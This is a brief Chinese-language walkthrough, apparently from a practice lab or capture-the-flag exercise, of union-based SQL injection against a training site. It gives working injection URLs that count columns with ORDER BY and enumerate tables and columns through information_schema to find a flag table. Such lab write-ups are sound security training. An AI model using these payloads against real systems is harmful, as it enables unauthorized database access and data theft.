RANK1
一、查看是否有SQL漏洞
id=2和id=4-2回显相同内容,说明有SQL注入漏洞
二、猜字段
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 4
说明只有3个字段
三、查找回显点
2,3字段会显示,所以第2,3字段是回显点
四、系统自带库查找表名,字段名
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1.22222%20union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
查找到第一个表就是error_flag
第二个表是user
查找字段flag,在第三个字段
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1%20union select 1,2,column_name from information_schema.columns where table_name='error_flag' and table_schema=database() limit 1,1